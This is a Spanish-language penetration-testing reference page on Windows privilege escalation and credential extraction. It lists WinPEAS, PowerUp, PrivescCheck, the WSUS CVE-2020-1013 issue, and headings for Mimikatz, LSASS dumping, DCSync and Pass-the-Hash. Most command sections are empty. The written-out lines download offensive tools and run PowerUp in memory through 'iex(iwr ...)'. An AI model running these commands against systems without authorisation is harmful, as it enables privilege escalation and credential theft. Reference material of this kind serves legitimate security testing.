Windows

Enumeración automatizada

WinPEAS

https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS

Última versión y binarios: https://github.com/peass-ng/PEASS-ng/releases

iwr https://github.com/peass-ng/PEASS-ng/releases/download/20241007-05f777b2/winPEASx64.exe -outputfile winpeas64.exe

Otras formas de transferir ficheros: Misc

Ejecución básica:

.\winPEASx64.exe

Para entornos más restringidos, se puede usar un loader que permita cargar y ejecutar en memoria el programa. Por ejemplo:

Windows

.\sloader.exe -f C:\Pentest\Tools\winPEASx64.exe -p notcolor log

PowerUp

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

. C:\AD\Tools\PowerUp.ps1
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)

Se enumeran las posibles vías de elevación de privilegios y se exporta la información a un fichero html:

PrivescCheck

https://github.com/itm4n/PrivescCheck

Vulnerabilidades

Actualizaciones vía WSUS

WSUS (Windows Server Update Services) es un servicio que permite gestionar la distribución de actualizaciones en redes corporativas con sistemas Windows.

Es un servidor centralizado que descarga y distribuye parches de seguridad y actualizaciones en los clientes de la red local.

Para comprobar si el servidor WSUS es vulnerable a CVE-2020-1013, se tienen que dar dos condiciones:

  1. El servidor WSUS tiene que utilizar el protocolo HTTP en vez de HTTPS. Para comprobar cuál servidor WSUS se está utilizando:

  1. Que el uso del servidor WSUS esté activado. Para ello, el resultado del siguiente registro debe ser igual a 0:

Writeup de la investigación y presentación en la BlackHat:

Otras referencias:

Escalada de privilegios

Equipo conectado con Azure

Otras formas de transferir ficheros: Misc

Servicio modificable

Identificación

Herramienta
Comando

PowerUp

Ejemplo de explotación

Herramienta
Comando

PowerUp

Máquinas del dominio con acceso privilegiado

Buscar máquinas donde el usuario tiene permisos de administrador local:

  • winrs:

  • PSSession:

Extracción de credenciales

Obtención de SAM, SYSTEM, SECURITY

GPP - Group Password Policy

Mimikatz

Dump LSASS

Seckurlsa

Kerberos

DSync

Vault

Terminal Services

Pass-the-Hash

Credenciales en eventos de logs

Se parsean los logs de Windows Event ID 4688 para extraer credenciales:

Referencias

Última actualización

¿Te fue útil?